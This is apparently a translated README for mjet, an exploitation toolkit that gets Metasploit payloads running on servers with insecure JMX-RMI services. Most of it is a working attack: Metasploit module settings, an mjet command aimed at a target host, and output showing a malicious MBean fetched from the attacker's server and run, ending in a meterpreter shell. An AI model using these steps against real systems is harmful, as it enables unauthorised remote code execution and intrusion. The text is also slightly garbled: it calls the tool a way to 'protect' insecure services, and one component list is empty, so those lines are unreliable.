Mogwai Security Java 管理扩展(JMX)漏洞利用工具包
mjet 是一个可用于保护配置不安全的 JMX 服务的工具。它基于 Braden Thomas/Accuvant 的博文“Exploiting JMX-RMI”(http://www.accuvant.com/blog/exploiting-jmx-rmi),可用于在目标系统上执行任意的 Metasploit 载荷。
mjet 最初计划成为一个完整的攻击工具包,但我们注意到 Metasploit 的 Github 仓库中有一个拉取请求,该请求将以原生 Ruby 提供基本的 Java RMI/序列化支持。这太棒了,并且消除了对 Java 的依赖。因此我们停止开发此工具,并在不久的将来创建 Metasploit 模块。
mjet 包含以下部分:
该示例使用以下系统: attacker: 192.168.178.1 target: 192.168.178.200,JMX 服务运行在 tcp 端口 1616 上
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
使用 mjet.jar 连接存在漏洞的 JMX 服务,并提供 MLet Web 服务器的 URL...
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
然后享受你的 meterpreter shell :-)